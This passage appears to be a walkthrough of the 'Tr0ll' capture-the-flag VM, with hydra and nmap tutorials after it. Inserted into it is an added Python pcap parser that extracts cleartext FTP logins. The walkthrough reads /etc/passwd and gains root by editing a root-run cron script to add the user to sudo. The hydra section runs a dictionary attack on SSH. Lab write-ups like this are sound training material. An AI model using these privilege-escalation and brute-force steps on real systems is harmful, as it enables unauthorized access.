150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛

Sucks, you were so close... gotta TRY HARDER!
3      FIN-WAIT-1     10.0.0.6:ftp-data > 10.0.0.12:51884
3      TIME-WAIT      10.0.0.6:ftp-data > 10.0.0.12:51884
3      CLOSED         10.0.0.6:ftp-data > 10.0.0.12:51884
226 Transfer complete.
TYPE A
200 Switching to ASCII mode.
PORT 10,0,0,12,172,74
200 PORT command successful. Consider using PASV.
LIST
4      SYN-SENT       10.0.0.6:ftp-data > 10.0.0.12:44106
4      SYN-RECEIVED   10.0.0.6:ftp-data > 10.0.0.12:44106
4      ESTABLISHED    10.0.0.6:ftp-data > 10.0.0.12:44106
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
4      FIN-WAIT-1     10.0.0.6:ftp-data > 10.0.0.12:44106
4      TIME-WAIT      10.0.0.6:ftp-data > 10.0.0.12:44106
4      CLOSED         10.0.0.6:ftp-data > 10.0.0.12:44106
226 Directory send OK.
QUIT
221 Goodbye.
1      FIN-WAIT-1     10.0.0.12:52449 > 10.0.0.6:ftp
1      TIME-WAIT      10.0.0.12:52449 > 10.0.0.6:ftp
1      CLOSED         10.0.0.12:52449 > 10.0.0.6:ftp
tcpick: done reading from lol.pcap

67 packets captured
4 tcp sessions detected

So we can see here that someone has logged in as anonymous.
And listed all the files in a directory, and it contains the mysterious file secret_stuff.txt.
It also contains a little message from our troll that talks about a supersecretdir.

-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛
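The tcpick output above is essentially the TCP payloads of the capture printed per session. As an added example (not from the write-up), the script below reads a classic pcap with only the standard library, walks the Ethernet/IPv4/TCP headers, reassembles the port-21 control channel per client and lists the commands, which is also how a defender would spot cleartext FTP logins in a capture. The capture is constructed inline to mirror the exchange shown (10.0.0.12 talking to 10.0.0.6); it assumes packets arrive in order and does not use TCP sequence numbers.

```python
"""Minimal pcap reader that pulls the FTP control channel out of a capture."""
import struct

ETH_LEN = 14


def _build_packet(src, dst, sport, dport, payload):
    """Constructed test data: Ethernet + IPv4 + TCP frame (checksums left zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def build_pcap(frames):
    """Wrap raw frames in a little-endian pcap container (linktype 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for n, frame in enumerate(frames):
        out += struct.pack("<IIII", 1407600000 + n, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_payloads(pcap):
    """Yield (src, sport, dst, dport, payload) for every TCP packet carrying data."""
    magic = pcap[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet captures are handled here")
    pos = 24
    while pos + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[pos:pos + 16])
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if frame[12:14] != b"\x08\x00":      # not IPv4
            continue
        ip = frame[ETH_LEN:]
        if ip[9] != 6:                        # not TCP
            continue
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield src, sport, dst, dport, payload


def ftp_sessions(pcap):
    """Map (client, client_port, server) to the list of (VERB, argument) the
    client sent on port 21, e.g. [('USER', 'anonymous'), ('PASS', 'password')]."""
    buffers = {}
    for src, sport, dst, dport, payload in iter_tcp_payloads(pcap):
        if dport == 21:
            buffers.setdefault((src, sport, dst), bytearray()).extend(payload)
    sessions = {}
    for key, buf in buffers.items():
        cmds = []
        for line in buf.decode("latin-1").split("\r\n"):
            if line:
                verb, _, arg = line.partition(" ")
                cmds.append((verb.upper(), arg))
        sessions[key] = cmds
    return sessions


def cleartext_logins(pcap):
    """Defender's view: (client, server, user, password) pairs sent in the clear."""
    found = []
    for (src, _, dst), cmds in ftp_sessions(pcap).items():
        user = None
        for verb, arg in cmds:
            if verb == "USER":
                user = arg
            elif verb == "PASS":
                found.append((src, dst, user, arg))
    return found


# Constructed capture reproducing the control-channel exchange seen in lol.pcap.
CLIENT, SERVER = "10.0.0.12", "10.0.0.6"
SAMPLE_PCAP = build_pcap([
    _build_packet(SERVER, CLIENT, 21, 52449, b"220 (vsFTPd 3.0.2)\r\n"),
    _build_packet(CLIENT, SERVER, 52449, 21, b"USER anonymous\r\n"),
    _build_packet(SERVER, CLIENT, 21, 52449, b"331 Please specify the password.\r\n"),
    _build_packet(CLIENT, SERVER, 52449, 21, b"PASS password\r\n"),
    _build_packet(SERVER, CLIENT, 21, 52449, b"230 Login successful.\r\n"),
    _build_packet(CLIENT, SERVER, 52449, 21, b"RETR secret_stuff.txt\r\n"),
    _build_packet(CLIENT, SERVER, 52449, 21, b"QUIT\r\n"),
])

if __name__ == "__main__":
    for key, cmds in ftp_sessions(SAMPLE_PCAP).items():
        print(key, cmds)
    print(cleartext_logins(SAMPLE_PCAP))
```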

Okay, so a supersecret directory. Let’s check it out in the browser.

Okay, it shows us a directory with a file called roflmao. Let’s download it.

$ file roflmao                                                                                                           
roflmao: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

Okay. So it is an executable. Let’s execute it then

chmod +x roflmao
./roflmao
#It returns
Find address 0x0856BF to proceed

It looks like a hexadecimal value. But where to use it?
I convert it to decimals using python

print(int("0x0856BF", 16))
#Output:
546495

That number doesn’t really tell me anything.

Okay, so I try both decimal and hexadecimal numbers in the browser. http://troll.dev/0x0856BF/ leads me to a directory with a text of what I suppose is passwords.
http://troll.dev/0x0856BF/good_luck/which_one_lol.txt

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

It could be passwords, or usernames. In the other folder there is a dir called: his_folder_contains_the_password/ with the file Pass.txt in it.

I figure the next step must be ssh. So after trying many different combinations, which was made harder by the fact that the server has some kind of fail2ban mechanism installed, I figured the username was overflow and the password was Pass.txt.

Okay. So we get a shell, but it is a pretty crappy one so I just write bash and it gives me a bash-shell. Great!

Enumeration and Privilege Escalation

Okay, so we have a shell and we are in. But after a few minutes we are kicked out. I guess there is a cronjob doing it.
Let’s see what other users we have.

sudo -v
Sorry, user overflow may not run sudo on troll.

cat /etc/passwd
troll:x:1000:1000:Tr0ll,,,:/home/troll:/bin/bash
lololol:x:1001:1001::/home/lololol:
overflow:x:1002:1002::/home/overflow:
ps-aux:x:1003:1003::/home/ps-aux:
maleus:x:1004:1004::/home/maleus:
felux:x:1005:1005::/home/felux:
Eagle11:x:1006:1006::/home/Eagle11:
genphlux:x:1007:1007::/home/genphlux:
usmc8892:x:1008:1008::/home/usmc8892:
blawrg:x:1009:1009::/home/blawrg:
wytshadow:x:1010:1010::/home/wytshadow:
vis1t0r:x:1011:1011::/home/vis1t0r:

I have removed all users that are root and system-users. So we are left with 12 users. All part of their own groups.
I can’t find out if any of them are sudo users because I don’t have permission to view /etc/sudoers. We can also tell that the passwords are encrypted and in the shadow file, that we don’t have access to.

Let’s look

$ find / -writable -type d 2>/dev/null
/tmp
/run/user/1002
/run/shm
/run/lock
/var/tmp
/sys/fs/cgroup/systemd/user/1002.user/10.session
/proc/4981/task/4981/fd
/proc/4981/fd
/proc/4981/map_files

Let’s see what is in /var/tmp.

overflow@troll:/tmp$ cd /var/tmp
overflow@troll:/var/tmp$ ls
cleaner.py.swp
overflow@troll:/var/tmp$ cat cleaner.py.swp 
crontab for cleaner.py successful

overflow@troll:/var/tmp$ find / -iname cleaner.py 2>/dev/null
/lib/log/cleaner.py

overflow@troll:/lib/log$ cat cleaner.py 
#!/usr/bin/env python
import os
import sys
try:
	os.system('rm -r /tmp/* ')
except:
	sys.exit()
overflow@troll:/lib/log$ 

I ran a few other commands as well looking for setuid files. Those commands can be found on this amazing page.

Okay, so we have a file that is owned by root and run as a cron every time I get kicked out. So maybe I can just make myself sudo.

import os
os.system("sudo usermod -aG sudo overflow")

Now I just wait for the cronjob to kick me out and run the code.
So I get kicked out and then I just run:

sudo su

And I am root.

How to use hydra to perform dictionary attacks

So I have been playing around with some vulnerable VMs (from the awesome vulnhub.com). Some of them have had ftp and ssh services running on them. So I have tried to make dictionary attacks against them.

First we need some dictionaries with passwords. Here is a great collection of dictionaries/password-lists

This is the basic syntax. So first we add the list with usernames. Then the list of passwords. Then the ip. Then we specify the port (-s) then the service (in this case ssh). -V is for verbose mode.
The -s is only needed if the service is on another port than the default.

hydra -L userlist.txt -P best1050.txt 192.168.1.103 -s 45061 ssh -V

The man page is really quite useful.

Nmap commands

Find hosts/devices on the network

nmap -sP 192.168.0.1/24
To find out what devices are on the network you need to know the ip of the router.
Here are some common:
10.0.1.1
10.0.0.2
10.0.0.138
192.168.0.1
192.168.1.1
192.168.1.10.1
192.168.11.1
192.168.2.1
192.168.3.1
192.168.1.254
192.168.254.254

Here is a more complete list, and according to model.
For default usernames and passwords check here.

Scan for open ports

The most simple of commands to check for some standard ports is:

nmap 192.168.0.103

But that does not check all of the possible ports.

nmap -p 1-65535 192.168.0.164

Or decide what ports you do want to check.

Check what service uses a specific port

Let’s say we find some open ports. But the port is either too high to have a specific service, or it is on a port that is not usually used for it. For example, a lot of people are moving their ssh to not be port 22 to avoid spam-attacks.

45061/tcp open  unknown

So we just add the -sV flag.

sudo nmap -sV -p 45061 192.168.1.103

Here is the Nmap-documentation for it.